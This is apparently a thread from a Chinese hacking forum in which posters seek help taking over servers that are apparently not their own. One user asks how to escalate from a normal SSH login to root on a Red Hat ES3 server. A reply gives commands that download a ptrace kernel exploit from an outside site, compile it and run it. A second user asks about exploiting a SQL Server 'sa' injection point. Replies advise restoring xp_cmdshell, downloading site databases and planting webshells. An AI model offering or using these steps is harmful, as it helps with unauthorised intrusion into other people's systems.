发新话题
打印

[讨论]Linux 服务器本地提权问题

[讨论]Linux 服务器本地提权问题

信息来源:邪恶八进制信息安全团队(www.eviloctal.com
议题作者:w100

这个问题问了很多人都没有结果 ,知道邪八 高手多,求教。

条件:
1 内核:Linux ×××.com 2.4.21-9.0.1ELsmp
2 已获取权限:putty 连接 22 端口,普通用户 登录成功

初步判断与攻击:
Redhat ES3 服务器 ,下载uselib24.c,ptrace24,ptrace/kmod(),do_brk(hatorihanzo.c),本地提权程序攻击 失败。
判断与架构有关(双核服务器、单CPU),导致溢出失败。

提问:
针对服务器,各位 有相应的溢出程序有提权成功的 经验吗吗?
有的话 , 请帮助  

谢谢

邮箱king_public@163.com

TOP

硬要溢出的话 我看够呛...... Sniff一下试试看吧,,
保持!保持脑袋时刻灵活!

TOP

尝试不同的溢出程序吧

TOP

2.4应该是可以溢出的啊。

TOP

服务器版 的 2.4 好像不好溢出

xiao2004 :你能帮我试试 Redhat ES 3 (2.4.21)溢出吗 ?

TOP

再次遇见变态的SA

今天碰到了一个SA的字符型注射点,WEB与DATA并不分离,可以列出WEB目录,但是执行不了命令,也上传不了文件,换了几个目录还是一样,开沙盒模式页面返回正常,用soshell执行命令也提示成功,但无法登陆3389!
希望大虾赐教,小弟在此多谢了!

TOP

TOP

回复 9楼 creak_bing 的帖子

无法执行命令是SQL上删除掉了存储过程xp_cmshell,如果可以netstat -an的话看下3389是否存在,
是否服务器为内网,是否有防火墙。。
邪恶八进制信息安全团队
--努力为祖国的信息安全撑起一片蓝天!

TOP

wget http://bbs.tian6.com/linux_exp/2.4.21/ptrace.c
gcc ptrace.c -o su
./su
whoami

试下这个

TOP

Linux Kernel 2.x sock_sendpage() Local Root Exploit
这个应该管用吧

TOP

引用:
原帖由 creak_bing 于 2008-9-29 02:00 发表
今天碰到了一个SA的字符型注射点,WEB与DATA并不分离,可以列出WEB目录,但是执行不了命令,也上传不了文件,换了几个目录还是一样,开沙盒模式页面返回正常,用soshell执行命令也提示成功,但无法登陆3389!
希望大虾赐教,小 ...
查看sql里binn目录下dll是否完整,用webshell,应该会有提示

TOP

回复 6楼 creak_bing 的帖子

可列web目录还不好阿,
列web目录看有米有ewebeditor.存在admin_login.asp的话,直接下mdb数据库,叼shell呗.
这个服务器上有几个站,如果是虚拟机的话,
就多找些web目录看有米有access类型的站点,然后下载mdb,直接登录后台叼shell,
要不再换个工具试试,不工具检测的不一样,说不定是个db点.
可列目录,就试试用手工logshell,多试试几个目录,imgs这些图片目录,
因为你说不可连接3389,那就先从shell下手,
shell拿下后,再找sql用户看是否是sa;

TOP

发新话题